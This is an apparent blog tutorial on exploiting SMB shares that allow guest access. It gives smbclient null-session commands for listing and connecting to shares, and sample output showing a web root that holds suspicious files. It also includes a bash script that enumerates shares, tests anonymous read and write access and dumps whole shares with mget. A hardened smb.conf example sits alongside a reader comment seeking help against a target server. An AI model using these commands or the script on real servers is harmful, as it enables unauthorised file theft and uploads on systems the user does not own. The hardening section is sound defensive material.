How to Exploit a Poorly Configured SMB

August 1, 2016 | Views: 43316



What’s an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that’s incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

 

Exploiting Badly Configured SMB Shares

What you'll need:

  1. A machine with the smbclient command (on Linux it ships in the Samba client package)
  2. A vulnerable/poorly configured SMB server (remote or local), e.g. a Samba share that accepts guest access
  3. Network access to the server's SMB port: TCP 445 (or TCP 139 for SMB over NetBIOS)


Steps:
Check Sharenames

To list the shares a server offers, use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = IP of the vulnerable SMB server; -L lists its shares, -N skips the password prompt and sends an empty password, i.e. it attempts a null/anonymous session)

You’ll get something like this:

`WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    arquivos        Disk
    IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    SAMBA                Samba Server 4.3.9-Ubuntu

    Workgroup            Master
    ---------            -------
    COMPUTACAO           SAMBA
`
After doing that, you'll need to pick a Sharename, for example "arquivos" or "IPC$". I highly recommend picking one whose name does not end in "$": those are hidden/administrative shares (IPC$ only carries named pipes, not files, and ADMIN$ or C$ on a Windows host need administrator credentials), whereas a plain disk share like "arquivos" is the one most likely to be readable without any credentials. One caveat: a Samba share with "browseable = no" does not appear in the -L listing at all, but it can still be opened by name if you know or can guess it.

In this case, I’m going to pick “arquivos” as Sharename.

Finally, connect to the share, again with an empty password:

smbclient //192.168.25.1/arquivos -N

And, that's pretty much it.
If the share is misconfigured to allow guest access (in Samba terms "guest ok = yes", plus "writable = yes" for uploads), you land in an interactive prompt where you can list files (ls), download them (get/mget) and upload your own (put/mput).
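To make "poorly configured" concrete, here is an added illustration (my example, not from the original post) of a Samba smb.conf share definition that produces exactly this anonymous read/write access, next to a corrected version. The share name and workgroup are taken from the listing above; the path and the Unix group name are assumed.

```ini
; Added illustration of a weak vs. a corrected Samba share definition.
; Share name and workgroup come from the post; path and group name are assumed.

; --- poorly configured: anyone on the network can read AND write "arquivos" ---
[global]
   workgroup = COMPUTACAO
   ; unknown users are silently mapped to the guest account
   map to guest = Bad User

[arquivos]
   ; assumed path; the listing (html, phpmyadmin, ...) looks like a web root
   path = /var/www
   browseable = yes
   ; an empty password (smbclient -N) is accepted
   guest ok = yes
   ; ... and the guest may upload files (put/mput)
   writable = yes

; --- corrected: authenticated users only, read-only unless uploads are needed ---
[global]
   workgroup = COMPUTACAO
   ; failed logins fail instead of becoming guest
   map to guest = Never
   ; refuse anonymous IPC$ connections as well
   restrict anonymous = 2

[arquivos]
   path = /var/www
   browseable = yes
   guest ok = no
   ; assumed Unix group of the users who should see this share
   valid users = @arquivos
   ; change to "read only = no" only for the users who really must upload
   read only = yes
```

With the corrected fragment in place, the two smbclient commands from this walkthrough (-L with -N, then a connection with -N) both fail with NT_STATUS_ACCESS_DENIED instead of handing out a file listing.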

EX:
`
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jul 19 09:12:48 2016
  ..                                  D        0  Fri May 22 09:25:21 2015
  html                                D        0  Fri Jul 15 03:48:38 2016
  codeigniter                         D        0  Fri Jul  3 17:00:48 2015
  serverconfig.php                    A   100402  Fri Jul 15 03:48:46 2016
  phpmyadmin                          D        0  Fri May 22 16:28:47 2015
  khy                                AR        0  Tue Jul 19 09:12:48 2016
  cgitelnet1                          D        0  Fri Jul 15 05:40:41 2016
  supp1.1                             D        0  Tue Jul  7 19:35:09 2015
  index.html                          N      142  Tue May 10 16:30:59 2016
  teste.php                           A       21  Fri May 22 11:56:35 2015
  enxjdf.exe                          N   571074  Mon Apr 14 16:06:33 2008
  cherno.php                          N   210752  Fri Jul 15 05:13:46 2016

                151380148 blocks of size 1024. 132224492 blocks available
smb: \>
`

You can view all the smbclient commands by typing "?". The ones you'll use most are ls, get/mget, put/mput, and the two toggles recurse and prompt: with recursion on and prompting off, "mget *" pulls an entire share down in one go.

`smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
`
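Putting the steps together, here is an added helper script (my example, not part of the original post and not the author's Python script) that automates the enumerate-then-connect procedure: it lists shares with smbclient's grepable output (-g), skips hidden "$" shares, and classifies each remaining disk share as none/read/write for an anonymous (-N) user by trying an ls and then a throwaway upload. The target address is whatever you pass as the first argument; the sample listing embedded at the bottom is constructed from the post's output so the parsing step runs without a live server.

```bash
#!/usr/bin/env bash
# Added example, not the post's own script: enumerate SMB shares over a null
# session and probe each non-hidden disk share for anonymous read/write access.
# Assumes smbclient (Samba 4.x client tools) is installed. The target address
# is supplied by the caller; 192.168.25.1 in the post is only an illustration.

# Parse the grepable output of `smbclient -L HOST -N -g`, which prints one
# "Type|Name|Comment" line per share, and emit only Disk shares whose name
# does not end in "$" (hidden/administrative shares such as IPC$ or ADMIN$).
list_disk_shares() {
  awk -F'|' '$1 == "Disk" && $2 !~ /[$]$/ { print $2 }'
}

# Run one or more smbclient commands (separated by ";") against a share with
# an empty password (-N). Returns smbclient's exit status: 0 = success.
smb_anon() {
  local host=$1 share=$2 cmds=$3
  smbclient "//$host/$share" -N -c "$cmds" >/dev/null 2>&1
}

# Classify a share as none / read / write for an anonymous user. The write
# test uploads an empty marker file and deletes it again straight away.
probe_share() {
  local host=$1 share=$2 result=none marker
  marker=$(mktemp) || return 1
  if smb_anon "$host" "$share" "ls"; then
    result=read
    if smb_anon "$host" "$share" "put $marker .smbprobe.$$; del .smbprobe.$$"; then
      result=write
    fi
  fi
  rm -f "$marker"
  printf '%s\t%s\n' "$share" "$result"
}

# Pull a whole readable share into a local directory: "recurse" and "prompt"
# toggle recursion on and confirmation off, then "mget *" fetches everything.
dump_share() {
  local host=$1 share=$2 dest=$3
  mkdir -p "$dest" &&
    smbclient "//$host/$share" -N -c "lcd $dest; recurse; prompt; mget *"
}

# Enumerate and probe every candidate share on a host.
scan_host() {
  local host=$1 share
  smbclient -L "$host" -N -g 2>/dev/null | list_disk_shares |
    while read -r share; do probe_share "$host" "$share"; done
}

# Constructed sample of `smbclient -L -N -g` output, modelled on the listing
# in the post, so the parsing step can be exercised without a live server.
SAMPLE_GREPABLE='Disk|arquivos|
IPC|IPC$|IPC Service (Samba Server 4.3.9-Ubuntu)
Disk|ADMIN$|Remote Admin
Printer|HP_LaserJet|'

if [ -n "${1:-}" ]; then
  scan_host "$1"                                        # ./smbprobe.sh 192.168.25.1
else
  printf '%s\n' "$SAMPLE_GREPABLE" | list_disk_shares   # prints: arquivos
fi
```

Run it as "./smbprobe.sh 192.168.25.1" against a lab host to get one "share<TAB>none|read|write" line per candidate; shares that report "write" are the ones where the upload step of the walkthrough will succeed. The write probe leaves nothing behind because it deletes its marker in the same smbclient session, but on an engagement you should still note the share and timestamp, since the server's audit log will record the put.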


I made a Python script that does all the hard work; if you want, you can get it here.

6 Comments
  1. Please, I have a target server that allows only anonymous login; it doesn't list any share when scanning.
